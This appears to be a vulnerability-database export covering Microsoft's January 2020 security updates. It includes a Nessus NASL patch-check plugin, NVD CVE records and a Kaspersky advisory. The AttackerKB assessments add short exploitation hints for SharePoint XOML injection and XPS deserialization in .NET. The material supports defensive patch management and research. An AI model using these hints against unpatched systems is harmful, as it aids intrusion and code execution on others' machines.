legitimate users' credentials. (CVE-2020-0637)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface Plus (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when Windows fails to properly handle certain symbolic links. An attacker who successfully exploited this vulnerability could potentially set certain items to run at a higher level and thereby elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when Microsoft Cryptographic Services improperly handles files. An attacker could exploit the vulnerability to overwrite or modify a protected file leading to a privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in Windows Media Service that allows file creation in arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could obtain information that could be useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server. An attacker who successfully exploited this vulnerability could execute arbitrary code on the computer of the connecting client. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when Microsoft Windows implements predictable memory section names. An attacker who successfully exploited this vulnerability could run arbitrary code as system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0644)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "type": "nessus", "title": "KB4534309: Windows 8.1 and Windows Server 2012 R2 January 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0607", "CVE-2020-0608", "CVE-2020-0609", "CVE-2020-0610", "CVE-2020-0611", "CVE-2020-0613", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0620", "CVE-2020-0623", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0627", "CVE-2020-0628", "CVE-2020-0629", "CVE-2020-0630", "CVE-2020-0631", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0635", "CVE-2020-0637", "CVE-2020-0639", "CVE-2020-0640", "CVE-2020-0641", "CVE-2020-0642", "CVE-2020-0643", "CVE-2020-0644", "CVE-2020-0646"], "modified": "2020-08-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534297.NASL", "href": "https://www.tenable.com/plugins/nessus/132863", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132863);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/07\");\n\n script_cve_id(\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0609\",\n \"CVE-2020-0610\",\n \"CVE-2020-0611\",\n \"CVE-2020-0613\",\n \"CVE-2020-0614\",\n \"CVE-2020-0615\",\n \"CVE-2020-0620\",\n \"CVE-2020-0623\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0637\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0641\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0644\"\n );\n script_xref(name:\"MSKB\", value:\"4534297\");\n script_xref(name:\"MSKB\", value:\"4534309\");\n script_xref(name:\"MSFT\", value:\"MS20-4534297\");\n script_xref(name:\"MSFT\", value:\"MS20-4534309\");\n script_xref(name:\"IAVA\", value:\"2020-A-0026\");\n\n script_name(english:\"KB4534309: Windows 8.1 and Windows Server 2012 R2 January 2020 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534309\nor cumulative update 4534297. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - A remote code execution vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an\n unauthenticated attacker connects to the target system\n using RDP and sends specially crafted requests. This\n vulnerability is pre-authentication and requires no user\n interaction. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on the target\n system. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-0609, CVE-2020-0610)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - An information disclosure vulnerability exists when\n Remote Desktop Web Access improperly handles credential\n information. An attacker who successfully exploited this\n vulnerability could obtain legitimate users'\n credentials. (CVE-2020-0637)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4534297/windows-8-1-kb4534297\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4534309/windows-8-1-kb4534309\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4534309 or Cumulative Update KB4534297.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534297', '4534309');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534297, 4534309])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T11:41:20", "description": "A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file.An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user, aka '.NET Framework Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-0605.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-01-14T23:15:00", "type": "cve", "title": "CVE-2020-0606", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0605", "CVE-2020-0606"], "modified": "2020-01-17T03:03:00", "cpe": ["cpe:/a:microsoft:.net_framework:4.5.2", "cpe:/a:microsoft:.net_framework:4.6.1", "cpe:/a:microsoft:.net_framework:3.5", "cpe:/a:microsoft:.net_framework:4.7.1", "cpe:/a:microsoft:.net_framework:4.7.2", "cpe:/a:microsoft:.net_core:3.0", "cpe:/a:microsoft:.net_framework:3.0", "cpe:/a:microsoft:.net_framework:3.5.1", "cpe:/a:microsoft:.net_framework:4.6", "cpe:/a:microsoft:.net_core:3.1", "cpe:/a:microsoft:.net_framework:4.8", "cpe:/a:microsoft:.net_framework:4.6.2", "cpe:/a:microsoft:.net_framework:4.7"], "id": "CVE-2020-0606", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-0606", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:.net_framework:4.8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.7:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.0:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_core:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_core:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:41:19", "description": "A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file.An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user, aka '.NET Framework Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-0606.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-01-14T23:15:00", "type": "cve", "title": "CVE-2020-0605", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0605", "CVE-2020-0606"], "modified": "2020-01-21T21:22:00", "cpe": ["cpe:/a:microsoft:.net_framework:4.5.2", "cpe:/a:microsoft:.net_framework:4.6.1", "cpe:/a:microsoft:.net_framework:3.5", "cpe:/a:microsoft:.net_framework:4.7.1", "cpe:/a:microsoft:.net_framework:4.7.2", "cpe:/a:microsoft:.net_core:3.0", "cpe:/a:microsoft:.net_core:1.0", "cpe:/a:microsoft:.net_framework:3.0", "cpe:/a:microsoft:.net_framework:3.5.1", "cpe:/a:microsoft:.net_framework:4.6", "cpe:/a:microsoft:.net_core:3.1", "cpe:/a:microsoft:.net_framework:4.8", "cpe:/a:microsoft:.net_framework:4.6.2", "cpe:/a:microsoft:.net_framework:4.7"], "id": "CVE-2020-0605", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-0605", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:.net_framework:4.8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.7:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_core:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.0:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_core:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_core:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:42:03", "description": "A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly, aka '.NET Framework Remote Code Execution Injection Vulnerability'.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-14T23:15:00", "type": "cve", "title": "CVE-2020-0646", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0646"], "modified": "2022-01-01T20:03:00", "cpe": ["cpe:/a:microsoft:.net_framework:4.5.2", "cpe:/a:microsoft:.net_framework:4.6.1", "cpe:/a:microsoft:.net_framework:3.5", "cpe:/a:microsoft:.net_framework:4.7.1", "cpe:/a:microsoft:.net_framework:4.7.2", "cpe:/a:microsoft:.net_framework:3.0", "cpe:/a:microsoft:.net_framework:3.5.1", "cpe:/a:microsoft:.net_framework:4.6", "cpe:/a:microsoft:.net_framework:4.8", "cpe:/a:microsoft:.net_framework:4.6.2", "cpe:/a:microsoft:.net_framework:4.7"], "id": "CVE-2020-0646", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-0646", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:.net_framework:4.8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.7:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.0:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6.1:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2021-07-20T20:15:31", "description": "A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file.An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user, aka \u2018.NET Framework Remote Code Execution Vulnerability\u2019. This CVE ID is unique from CVE-2020-0606.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at May 20, 2020 1:02pm UTC reported:\n\nA vulnerability exists in how Microsoft\u2019s XPS documents are processed using .NET that can be leveraged to execute code using a deserialization attack. XPS files are effectively ZIP archives containing multiple member, of which ones `.fdoc`, and `.fpage` can be used as triggers. While this vulnerability was patched in May of 2020, it\u2019s related to a similar vulnerability patched in January of 2020, which patched the same usage of the XPS document\u2019s `.fdseq` member file types.\n\nThe default XPS viewer in Windows **does not use .NET to render the XPS document making it unaffected by this vulnerability**. A vulnerable application would need to be configured to process a maliciously crafted XPS document. Due to this, it is unclear if in practice this vulnerability will require user interaction or authentication to leverage.\n\nSee: <https://www.mdsec.co.uk/2020/05/analysis-of-cve-2020-0605-code-execution-using-xps-files-in-net/>\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 2Assessed Attacker Value: 3\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T00:00:00", "type": "attackerkb", "title": "CVE-2020-0605", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0605", "CVE-2020-0606"], "modified": "2020-07-24T00:00:00", "id": "AKB:5635A082-A142-45A9-A677-DAB47F32BD83", "href": "https://attackerkb.com/topics/0QExVcmiG2/cve-2020-0605", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-14T23:28:13", "description": "A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly, aka \u2018.NET Framework Remote Code Execution Injection Vulnerability\u2019.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at March 20, 2020 1:31pm UTC reported:\n\nThe SharePoint WorkFlow component is affected by a vulnerability within .NET which can be abused to run arbitrary code when compiling XOML files. An authenticated user would need to issue an HTTP request with crafted XOML-formatted data (for which there are public examples). The vulnerability was patched for on-premises installations of SharePoint on January 2020.\n\nA correct crafted XOML request will result in extra C# code being written to a temporary file on disk as part of the exploitation process. This is how an OS command is then executed.\n\nBoth patched and unpatched systems will return compiler error information in the XML response to the HTTP request. A patched system will have an error stating `\"Compilation failed. The type name: ... is not a valid language-independent type name.\"`. Malformed requests will include relevant information in the compiler error text, which is usually a character escaping issue. For best results escape all characters that are non-alphanumeric as unicode like `\\u####`.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-14T00:00:00", "type": "attackerkb", "title": "CVE-2020-0646", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0646"], "modified": "2020-07-30T00:00:00", "id": "AKB:2A3F116D-DC02-4BEA-B9AD-39F7773274AE", "href": "https://attackerkb.com/topics/79GOZOJWWk/cve-2020-0646", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2021-12-22T23:41:02", "description": "### *Detect date*:\n01/14/2020\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Developer Tools. Malicious users can exploit these vulnerabilities to execute arbitrary code, cause denial of service.\n\n### *Affected products*:\n.NET Core 3.0 \nASP.NET Core 3.0 \nASP.NET Core 2.1 \nMicrosoft .NET Framework 4.6.2/4.7/4.7.1/4.7.2 \nMicrosoft .NET Framework 3.5.1 \nMicrosoft .NET Framework 3.5 AND 4.7.1/4.7.2 \nMicrosoft .NET Framework 3.5 AND 4.6.2/4.7/4.7.1/4.7.2 \nMicrosoft .NET Framework 3.5 AND 4.7.2 \nMicrosoft .NET Framework 4.6/4.6.1/4.6.2/4.7/4.7.1/4.7.2 \nMicrosoft .NET Framework 4.8 \nMicrosoft .NET Framework 4.5.2 \nMicrosoft .NET Framework 3.5 AND 4.8 \n.NET Core 3.1 \nMicrosoft .NET Framework 3.5 \nMicrosoft .NET Framework 4.6 \nMicrosoft .NET Framework 3.0 Service Pack 2 \nASP.NET Core 3.1\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2020-0603](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0603>) \n[CVE-2020-0602](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0602>) \n[CVE-2020-0605](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0605>) \n[CVE-2020-0646](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0646>) \n[CVE-2020-0606](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0606>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft .NET Framework](<https://threats.kaspersky.com/en/product/Microsoft-.NET-Framework/>)\n\n### *CVE-IDS*:\n[CVE-2020-0603](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0603>)9.3Critical 